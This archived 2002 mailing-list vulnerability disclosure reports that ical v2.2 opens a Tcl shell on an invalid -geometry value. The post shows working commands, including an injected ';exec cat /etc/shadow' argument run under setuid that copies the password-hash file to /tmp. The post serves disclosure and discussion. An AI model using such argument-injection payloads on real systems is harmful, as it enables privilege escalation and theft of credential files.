Issues with ical

From: Chris (amrosat_private)
Date: Sat Mar 23 2002 - 11:55:54 PST

Next message: heyhey_: "pure IE code injection"

Previous message: John Lampe: "Re: Wireless device vulnerability?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

note: this post is about the ical program (ical v2.2) released by Sanjay 
      Ghemawat,  which is a calender applicaton. Please do not confuse 
      this with iPlanet's iCal server.

ical is program written in tcl. It seems that when executing the program
with the -geometry option and an invalid value for geometry set, it drops
a shell in where the program was executed. The shell which is executed is 
the tclsh (TCL Shell). The following is an example of this problem:

[20:16] / $ ical -geometry invalidvalue
Application initialization failed: bad geometry specifier "invalidvalue"
% id
uid=500(orion) gid=500(orion) groups=500(orion)
%

By default ical has the following permissions set:

-rwxr-xr-x    1 root     root       276216 Jul 31  2001 /usr/bin/ical-2.2

I decided to set the program setuid to see if the shell was executed after 
program completion as my user, or before program completion as root user.
When I executed the program again in the same manner as I did before, I 
got the following:

[20:16] / $ ical -geometry invalidvalue
Application initialization failed: bad geometry specifier "invalidvalue"
% id
uid=500(orion) gid=500(orion) euid=0(root) groups=500(orion)
%

It seems to me that the program uses the uid which the program is using 
at this time is used to execute the shell.

Since by default the program is not set-uid it is not much of a security
issue although it seems strange to me that it would drop a shell. 

Sidenote: when using -geometry ";exec <whatever>" you are able to execute
	  commands and the like. Next to "exec" other tcl shell commands 
          such as "catch" and "set" can be used to manipulate variables.
          A quick example of this is (we're still set-uid here):
          
          [20:33] / $ ls -ail /tmp/shadowfile 
          ls: /tmp/shadowfile: No such file or directory
          [20:33] / $ cat /etc/shadow
          cat: /etc/shadow: Permission denied
          [20:33] / $ ical -geometry ";exec cat /etc/shadow >> /tmp/shadowfile"
          [20:33] / $ ls -ail /tmp/shadowfile
          277828 -rw-rw-r--    1 root     orion         969 Aug 18 20:33 /tmp/shadowfile


The above was based on tcl v8.3 and ical v2.2.

Possible other tcl-based programs may have the same issue,
allowing an attacker to gain root access.

Sorry if this issue has been posted before, just trying to find out if someone knows
of similar issues or not.

Cheers,

Chris.

Next message: heyhey_: "pure IE code injection"
Previous message: John Lampe: "Re: Wireless device vulnerability?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Sat Mar 23 2002 - 13:27:44 PST